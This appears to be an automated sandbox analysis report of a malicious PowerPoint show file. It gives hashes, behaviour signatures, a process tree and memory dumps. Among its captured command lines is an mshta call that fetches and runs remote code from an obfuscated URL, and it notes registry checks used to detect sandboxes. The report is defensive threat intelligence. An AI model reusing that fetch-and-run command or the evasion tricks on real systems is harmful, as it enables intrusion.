Analysis
- max time kernel: 119s
- max time network: 138s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 05-05-2021 15:02
Static task: static1
Behavioral task: behavioral1
- Sample: 1622576d_by_Libranalysis.pps
- Resource: win7v20210408
Behavioral task: behavioral2
- Sample: 1622576d_by_Libranalysis.pps
- Resource: win10v20210410
General
- Target: 1622576d_by_Libranalysis.pps
- Size: 707KB
- MD5: 1622576dd5cc993ae42f5c35b4b9ed2f
- SHA1: 6071d99ea546e6d74656bf8114bcd7a663eb84ba
- SHA256: c1110237231589eb7cb435f52783b0eb917baca45b075e8f78d5b78a0fe66688
- SHA512: 6d9501e71c7095050b1bd8a2ca467f926b008c6f36c17ce673b012730e3fc33dc29fd513e875635e6fc6cc446e57a0572477f82df038d4d81870a78447a29804
Malware Config
Signatures
- Process spawned unexpected child process (7 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: ping.exe, cmd.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 696 | 3876 | ping.exe | POWERPNT.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 2744 | 3876 | ping.exe | POWERPNT.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 3004 | 3876 | ping.exe | POWERPNT.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 1540 | 3876 | ping.exe | POWERPNT.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 2368 | 3876 | ping.exe | POWERPNT.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 2716 | 3876 | ping.exe | POWERPNT.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 2032 | 3876 | cmd.exe | POWERPNT.EXE
- Blocklisted process makes network request (3 IoCs)
  Processes: mshta.exe
  flow | pid | process
  27 | 792 | mshta.exe
  28 | 792 | mshta.exe
  30 | 792 | mshta.exe
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: POWERPNT.EXE, winword.exe
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | POWERPNT.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | winword.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | winword.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winword.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | POWERPNT.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | POWERPNT.EXE
- Enumerates system info in registry (2 TTPs, 6 IoCs)
  Processes: winword.exe, POWERPNT.EXE
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | winword.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | winword.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | POWERPNT.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | POWERPNT.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | POWERPNT.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | winword.exe
- Runs ping.exe (1 TTPs, 6 IoCs)
  Processes: ping.exe
  pid | process
  1540 | ping.exe
  2368 | ping.exe
  2716 | ping.exe
  696 | ping.exe
  2744 | ping.exe
  3004 | ping.exe
- Suspicious behavior: AddClipboardFormatListener (3 IoCs)
  Processes: POWERPNT.EXE, winword.exe
  pid | process
  3876 | POWERPNT.EXE
  4256 | winword.exe
  4256 | winword.exe
- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes: winword.exe
  pid | process
  4256 | winword.exe
- Suspicious use of SetWindowsHookEx (5 IoCs)
  Processes: POWERPNT.EXE, winword.exe
  pid | process
  3876 | POWERPNT.EXE
  4256 | winword.exe
  4256 | winword.exe
  3876 | POWERPNT.EXE
  4256 | winword.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes: POWERPNT.EXE, cmd.exe
  description | pid | process | target process
  PID 3876 wrote to memory of 696 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 696 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 2716 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 2716 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 2744 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 2744 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 3004 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 3004 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 1540 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 1540 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 2368 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 2368 | 3876 | POWERPNT.EXE | ping.exe
  PID 3876 wrote to memory of 2032 | 3876 | POWERPNT.EXE | cmd.exe
  PID 3876 wrote to memory of 2032 | 3876 | POWERPNT.EXE | cmd.exe
  PID 2032 wrote to memory of 792 | 2032 | cmd.exe | mshta.exe
  PID 2032 wrote to memory of 792 | 2032 | cmd.exe | mshta.exe
  PID 3876 wrote to memory of 4256 | 3876 | POWERPNT.EXE | winword.exe
  PID 3876 wrote to memory of 4256 | 3876 | POWERPNT.EXE | winword.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\1622576d_by_Libranalysis.pps" /ou ""
  PID: 3876
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  Child processes:
  - C:\Windows\SYSTEM32\ping.exe
    Command line: ping
    PID: 696
    - Process spawned unexpected child process
    - Runs ping.exe
  - C:\Windows\SYSTEM32\ping.exe
    Command line: ping
    PID: 2744
    - Process spawned unexpected child process
    - Runs ping.exe
  - C:\Windows\SYSTEM32\ping.exe
    Command line: ping
    PID: 3004
    - Process spawned unexpected child process
    - Runs ping.exe
  - C:\Windows\SYSTEM32\ping.exe
    Command line: ping
    PID: 1540
    - Process spawned unexpected child process
    - Runs ping.exe
  - C:\Windows\SYSTEM32\ping.exe
    Command line: ping
    PID: 2368
    - Process spawned unexpected child process
    - Runs ping.exe
  - C:\Windows\SYSTEM32\ping.exe
    Command line: ping
    PID: 2716
    - Process spawned unexpected child process
    - Runs ping.exe
  - C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c mshta http://1230948%[email protected]/jasidjijasdasdjjj
    PID: 2032
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    Child processes:
    - C:\Windows\system32\mshta.exe
      Command line: mshta http://1230948%[email protected]/jasidjijasdasdjjj
      PID: 792
      - Blocklisted process makes network request
  - C:\Program Files\Microsoft Office\Root\Office16\winword.exe
    Command line: winword.exe
    PID: 4256
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
  MD5: 597c3953c957a3a9037b93f637233fb6
  SHA1: 640c81f41bb10f016a893c595e253f1b2dc57fc3
  SHA256: 12521c0f1e9afbc0a21eb8fef2c408ee5ffe1e403b7d14c7c256b3b5bb4705a2
  SHA512: 74f788d321b686d9a0fd83fa55ddd5a3e5e3293b30ad79881d9cce607daddeed1ace45cbfede1822b35e765b5685717f1fc029b2c0c7ad91ecd1feb3ea3add62
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
  MD5: d0b70c2ed14cbe6bbc6c605730225bb8
  SHA1: 3035b223c4eb3733ea1fefb3080d1682c2a4dda5
  SHA256: 303add18cb4fcbd903d39c6e05263dfddccdb9c45f3a5b2915d567ad54fc807e
  SHA512: eee5d1476bce2321d7143fe7c06726a6c997711c2f2bc8ae70631be586f0814846c3f451df43052f67fd2bd66dc88ec080d358c434aff96664348cf4412a0d00
- memory/696-179-0x0000000000000000-mapping.dmp
- memory/792-186-0x0000000000000000-mapping.dmp
- memory/1540-183-0x0000000000000000-mapping.dmp
- memory/2032-185-0x0000000000000000-mapping.dmp
- memory/2368-184-0x0000000000000000-mapping.dmp
- memory/2716-180-0x0000000000000000-mapping.dmp
- memory/2744-181-0x0000000000000000-mapping.dmp
- memory/3004-182-0x0000000000000000-mapping.dmp
- memory/3876-114-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
  Filesize: 64KB
- memory/3876-123-0x00007FFDF5650000-0x00007FFDF7545000-memory.dmp
  Filesize: 31.0MB
- memory/3876-122-0x00007FFDFAB90000-0x00007FFDFBC7E000-memory.dmp
  Filesize: 16.9MB
- memory/3876-119-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
  Filesize: 64KB
- memory/3876-118-0x00007FFDFDCB0000-0x00007FFDFF88D000-memory.dmp
  Filesize: 27.9MB
- memory/3876-117-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
  Filesize: 64KB
- memory/3876-116-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
  Filesize: 64KB
- memory/3876-115-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
  Filesize: 64KB
- memory/4256-187-0x0000000000000000-mapping.dmp